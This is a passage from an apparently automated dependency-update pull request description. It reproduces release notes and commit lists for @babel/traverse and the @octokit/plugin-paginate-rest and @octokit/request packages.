parsing (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-traverse\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17708\"\u003e#17708\u003c/a\u003e fix(traverse): provide a hub when traversing a File or Program and no parentPath is given (\u003ca href=\"https://github.com/simbahax\"\u003e\u003ccode\u003e@​simbahax\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-plugin-transform-block-scoping\u003c/code\u003e, \u003ccode\u003ebabel-traverse\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17737\"\u003e#17737\u003c/a\u003e [7.x backport] fix: Rename switch discriminant references when body creates shadowing variable (\u003ca href=\"https://github.com/magic-akari\"\u003e\u003ccode\u003e@​magic-akari\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e:running_woman: Performance\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-generator\u003c/code\u003e, \u003ccode\u003ebabel-runtime-corejs3\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17642\"\u003e#17642\u003c/a\u003e [Babel 7] Improve generator performance (\u003ca href=\"https://github.com/liuxingbaoyu\"\u003e\u003ccode\u003e@​liuxingbaoyu\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eCommitters: 6\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eDavid (\u003ca href=\"https://github.com/simbahax\"\u003e\u003ccode\u003e@​simbahax\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eHuáng Jùnliàng (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eNicolò Ribaudo (\u003ca href=\"https://github.com/nicolo-ribaudo\"\u003e\u003ccode\u003e@​nicolo-ribaudo\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/liuxingbaoyu\"\u003e\u003ccode\u003e@​liuxingbaoyu\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/magic-akari\"\u003e\u003ccode\u003e@​magic-akari\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.28.6 (2026-01-12)\u003c/h2\u003e\n\u003cp\u003eThanks \u003ca href=\"https://github.com/kadhirash\"\u003e\u003ccode\u003e@​kadhirash\u003c/code\u003e\u003c/a\u003e and \u003ca href=\"https://github.com/kolvian\"\u003e\u003ccode\u003e@​kolvian\u003c/code\u003e\u003c/a\u003e for your first PRs!\u003c/p\u003e\n\u003ch4\u003e:bug: Bug Fix\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-cli\u003c/code\u003e, \u003ccode\u003ebabel-code-frame\u003c/code\u003e, \u003ccode\u003ebabel-core\u003c/code\u003e, \u003ccode\u003ebabel-helper-check-duplicate-nodes\u003c/code\u003e, \u003ccode\u003ebabel-helper-fixtures\u003c/code\u003e, \u003ccode\u003ebabel-helper-plugin-utils\u003c/code\u003e, \u003ccode\u003ebabel-node\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-flow-comments\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-modules-commonjs\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-property-mutators\u003c/code\u003e, \u003ccode\u003ebabel-preset-env\u003c/code\u003e, \u003ccode\u003ebabel-traverse\u003c/code\u003e, \u003ccode\u003ebabel-types\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17589\"\u003e#17589\u003c/a\u003e Improve Unicode handling in code-frame tokenizer (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-plugin-transform-regenerator\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17556\"\u003e#17556\u003c/a\u003e fix: \u003ccode\u003etransform-regenerator\u003c/code\u003e correctly handles scope (\u003ca href=\"https://github.com/liuxingbaoyu\"\u003e\u003ccode\u003e@​liuxingbaoyu\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-plugin-transform-react-jsx\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17538\"\u003e#17538\u003c/a\u003e fix: Keep jsx comments (\u003ca href=\"https://github.com/liuxingbaoyu\"\u003e\u003ccode\u003e@​liuxingbaoyu\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e:nail_care: Polish\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-core\u003c/code\u003e, \u003ccode\u003ebabel-standalone\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17606\"\u003e#17606\u003c/a\u003e Polish(standalone): improve message on invalid preset/plugin (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e:house: Internal\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-plugin-bugfix-v8-static-class-fields-redefine-readonly\u003c/code\u003e, \u003ccode\u003ebabel-plugin-proposal-decorators\u003c/code\u003e, \u003ccode\u003ebabel-plugin-proposal-import-attributes-to-assertions\u003c/code\u003e, \u003ccode\u003ebabel-plugin-proposal-import-wasm-source\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-async-do-expressions\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-decorators\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-destructuring-private\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-do-expressions\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-explicit-resource-management\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-export-default-from\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-flow\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-function-bind\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-function-sent\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-import-assertions\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-import-attributes\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-import-defer\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-import-source\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-jsx\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-module-blocks\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-optional-chaining-assign\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-partial-application\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-pipeline-operator\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-throw-expressions\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-typescript\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-async-generator-functions\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-async-to-generator\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-class-properties\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-class-static-block\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-dotall-regex\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-duplicate-named-capturing-groups-regex\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-explicit-resource-management\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-exponentiation-operator\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-json-strings\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-logical-assignment-operators\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-nullish-coalescing-operator\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-numeric-separator\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-object-rest-spread\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-optional-catch-binding\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-optional-chaining\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-private-methods\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-private-property-in-object\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-regexp-modifiers\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-unicode-property-regex\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-unicode-sets-regex\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17580\"\u003e#17580\u003c/a\u003e Allow Babel 8 in compatible Babel 7 plugins (\u003ca href=\"https://github.com/nicolo-ribaudo\"\u003e\u003ccode\u003e@​nicolo-ribaudo\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/aa8394e454337d118ac3d40bfa3ee1a3cb3f3ed2\"\u003e\u003ccode\u003eaa8394e\u003c/code\u003e\u003c/a\u003e v7.29.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/84366a8ea453814e732784db74cf2e2b6635eb6f\"\u003e\u003ccode\u003e84366a8\u003c/code\u003e\u003c/a\u003e fix(traverse): provide a hub when traversing a File or Program and no parentP...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/229eb452c5d5d2be0dc138ec2956aff7ff1057d7\"\u003e\u003ccode\u003e229eb45\u003c/code\u003e\u003c/a\u003e [7.x backport] fix: Rename switch discriminant references when body creates s...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/d7f400889567ae18ef9ac41b024b5120f6060e17\"\u003e\u003ccode\u003ed7f4008\u003c/code\u003e\u003c/a\u003e v7.28.6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/905bc22b2fff23673eabe467815c67b29bf8bba2\"\u003e\u003ccode\u003e905bc22\u003c/code\u003e\u003c/a\u003e fix: lint errors in main branch (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-traverse/issues/17612\"\u003e#17612\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/a03e2b63ae530674e866b60350b7eb4a5fcb5f59\"\u003e\u003ccode\u003ea03e2b6\u003c/code\u003e\u003c/a\u003e fix: \u003ccode\u003epath.evaluate\u003c/code\u003e correctly returns \u003ccode\u003econfident\u003c/code\u003e (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-traverse/issues/17584\"\u003e#17584\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/aac2c37e11ad58905f7f9606103074e80bacbbcd\"\u003e\u003ccode\u003eaac2c37\u003c/code\u003e\u003c/a\u003e chore: Use Gulpfile.mts (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-traverse/issues/17579\"\u003e#17579\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/65c4a6b3ee0e1d32801529e841572bb22534e1f3\"\u003e\u003ccode\u003e65c4a6b\u003c/code\u003e\u003c/a\u003e [Babel 8] fix: Improve \u003ccode\u003etraverse\u003c/code\u003e types (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-traverse/issues/17574\"\u003e#17574\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/99dcba5e71de3bd81ce14077cfa5b6df58e9b177\"\u003e\u003ccode\u003e99dcba5\u003c/code\u003e\u003c/a\u003e chore: enable some ts-eslint rules (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-traverse/issues/17592\"\u003e#17592\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/c92c4919771105140015167f25f7bacac77c90d9\"\u003e\u003ccode\u003ec92c491\u003c/code\u003e\u003c/a\u003e Improve Unicode handling in code-frame tokenizer (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-traverse/issues/17589\"\u003e#17589\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/babel/babel/commits/v7.29.0/packages/babel-traverse\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by [GitHub Actions](\u003ca href=\"https://www.npmjs.com/~GitHub\"\u003ehttps://www.npmjs.com/~GitHub\u003c/a\u003e Actions), a new releaser for \u003ccode\u003e@​babel/traverse\u003c/code\u003e since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@octokit/plugin-paginate-rest` from 2.21.3 to 14.0.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/releases\"\u003e\u003ccode\u003e@​octokit/plugin-paginate-rest\u003c/code\u003e's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev14.0.0\u003c/h2\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v13.2.1...v14.0.0\"\u003e14.0.0\u003c/a\u003e (2025-10-31)\u003c/h1\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd immutable releases, enterprise team membership, enterprise team organization endpoints (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/413e8990ce34854cb3a7d22f8a7366ea6a1eb0d5\"\u003e413e899\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBREAKING CHANGES\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eRemove \u003ccode\u003eGET /projects/{project_id}/columns\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eRemove \u003ccode\u003eGET /enterprises/{enterprise}/secret-scanning/alerts\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev13.2.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v13.2.0...v13.2.1\"\u003e13.2.1\u003c/a\u003e (2025-10-20)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update \u003ccode\u003e@octokit/types\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/698\"\u003e#698\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/ba56fbcc7e41a9ae19b5f2c09d4b94f8e4c7d70a\"\u003eba56fbc\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev13.2.0\u003c/h2\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v13.1.1...v13.2.0\"\u003e13.2.0\u003c/a\u003e (2025-09-29)\u003c/h1\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003enew Projects v2 endpoints, new code scanning dismissal endpoints, many other endpoints (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/690\"\u003e#690\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/0e236cb76f82cfc073b381802e4fea03f59c213c\"\u003e0e236cb\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev13.1.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v13.1.0...v13.1.1\"\u003e13.1.1\u003c/a\u003e (2025-06-27)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ehandle url in response when using pagination with compareCommits (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/686\"\u003e#686\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/8e5da25f975d2f31dda6b8b588d71f2c768a8df2\"\u003e8e5da25\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev13.1.0\u003c/h2\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v13.0.1...v13.1.0\"\u003e13.1.0\u003c/a\u003e (2025-06-16)\u003c/h1\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd paginatantion support for  \u003ccode\u003ecompareCommits\u003c/code\u003e and \u003ccode\u003ecompareCommitsWithBasehead\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/678\"\u003e#678\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/6d8ea8ad68058e45883a1a7edaaf6d8a91d732bd\"\u003e6d8ea8a\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev13.0.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v13.0.0...v13.0.1\"\u003e13.0.1\u003c/a\u003e (2025-05-25)\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/413e8990ce34854cb3a7d22f8a7366ea6a1eb0d5\"\u003e\u003ccode\u003e413e899\u003c/code\u003e\u003c/a\u003e feat: add immutable releases, enterprise team membership, enterprise team org...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/3d311d679e3d3ebaf073a66c5ce8a0603bf47d52\"\u003e\u003ccode\u003e3d311d6\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency \u003ccode\u003e@​types/node\u003c/code\u003e to v24 (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/701\"\u003e#701\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/ba56fbcc7e41a9ae19b5f2c09d4b94f8e4c7d70a\"\u003e\u003ccode\u003eba56fbc\u003c/code\u003e\u003c/a\u003e fix(deps): update \u003ccode\u003e@octokit/types\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/698\"\u003e#698\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/80745be518d862ab9a304ffb7793be4ebc3de0ce\"\u003e\u003ccode\u003e80745be\u003c/code\u003e\u003c/a\u003e ci(action): update actions/checkout action to v5 (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/687\"\u003e#687\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/0e236cb76f82cfc073b381802e4fea03f59c213c\"\u003e\u003ccode\u003e0e236cb\u003c/code\u003e\u003c/a\u003e feat: new Projects v2 endpoints, new code scanning dismissal endpoints, many ...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/bf19e3ed5f5e833712d2663984c4ce456696e93e\"\u003e\u003ccode\u003ebf19e3e\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency prettier to v3.6.2 (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/685\"\u003e#685\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/4f9fc562b1dda9d8f724e8ffee444141c2f45673\"\u003e\u003ccode\u003e4f9fc56\u003c/code\u003e\u003c/a\u003e ci(action): update actions/setup-node action to v5 (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/688\"\u003e#688\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/8e5da25f975d2f31dda6b8b588d71f2c768a8df2\"\u003e\u003ccode\u003e8e5da25\u003c/code\u003e\u003c/a\u003e fix: handle url in response when using pagination with compareCommits (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/686\"\u003e#686\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/6d8ea8ad68058e45883a1a7edaaf6d8a91d732bd\"\u003e\u003ccode\u003e6d8ea8a\u003c/code\u003e\u003c/a\u003e feat: add paginatantion support for  \u003ccode\u003ecompareCommits\u003c/code\u003e and `compareCommitsWith...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/8ec2713699ee473ee630be5c8a66b9665bcd4173\"\u003e\u003ccode\u003e8ec2713\u003c/code\u003e\u003c/a\u003e fix(deps): update \u003ccode\u003e@octokit/types\u003c/code\u003e - no new paginated endpoints (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/680\"\u003e#680\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v2.21.3...v14.0.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@octokit/request` from 5.6.3 to 10.0.8\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/octokit/request.js/releases\"\u003e\u003ccode\u003e@​octokit/request\u003c/code\u003e's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev10.0.8\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.7...v10.0.8\"\u003e10.0.8\u003c/a\u003e (2026-02-20)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003euse \u003ccode\u003ejson-with-bigint\u003c/code\u003e instead of built-in JSON methods in order to properly support int64's (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/798\"\u003e#798\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/f13f5d9814cec9e51cdbe57e3864f9a7f95a9731\"\u003ef13f5d9\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev10.0.7\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.6...v10.0.7\"\u003e10.0.7\u003c/a\u003e (2025-11-13)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003ereadme:\u003c/strong\u003e properly structure the options for custom agent (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/786\"\u003e#786\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/f17c1c13c7cba81187c419da06b815ed741c950c\"\u003ef17c1c1\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/octokit/request.js/issues/785\"\u003e#785\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev10.0.6\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.5...v10.0.6\"\u003e10.0.6\u003c/a\u003e (2025-10-30)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v16 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/783\"\u003e#783\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/1aeac5672c04bc508e46796660465b1b67cf397c\"\u003e1aeac56\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev10.0.5\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.4...v10.0.5\"\u003e10.0.5\u003c/a\u003e (2025-09-29)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update octokit deps (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/772\"\u003e#772\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/30f83b64578eebf6988b44df495d235de8136e6e\"\u003e30f83b6\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev10.0.4\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.3...v10.0.4\"\u003e10.0.4\u003c/a\u003e (2025-09-29)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v15 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/775\"\u003e#775\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/ad78b4c8099a790d9ac3489342021896cabdbecd\"\u003ead78b4c\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev10.0.3\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.2...v10.0.3\"\u003e10.0.3\u003c/a\u003e (2025-06-20)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003epkg:\u003c/strong\u003e unreplaced version number in \u003ccode\u003edist-bundle/\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/765\"\u003e#765\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/5b181af867a6b3ccfd23800d876ff22e1e54fd7d\"\u003e5b181af\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev10.0.2\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.1...v10.0.2\"\u003e10.0.2\u003c/a\u003e (2025-05-20)\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/f13f5d9814cec9e51cdbe57e3864f9a7f95a9731\"\u003e\u003ccode\u003ef13f5d9\u003c/code\u003e\u003c/a\u003e fix: use \u003ccode\u003ejson-with-bigint\u003c/code\u003e instead of built-in JSON methods in order to prop...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/9ba6ae0fd2eff35a6c29a9f032eca6e9ba002976\"\u003e\u003ccode\u003e9ba6ae0\u003c/code\u003e\u003c/a\u003e Document that unsuccessful HTTP status code result in an exception (\u003ca 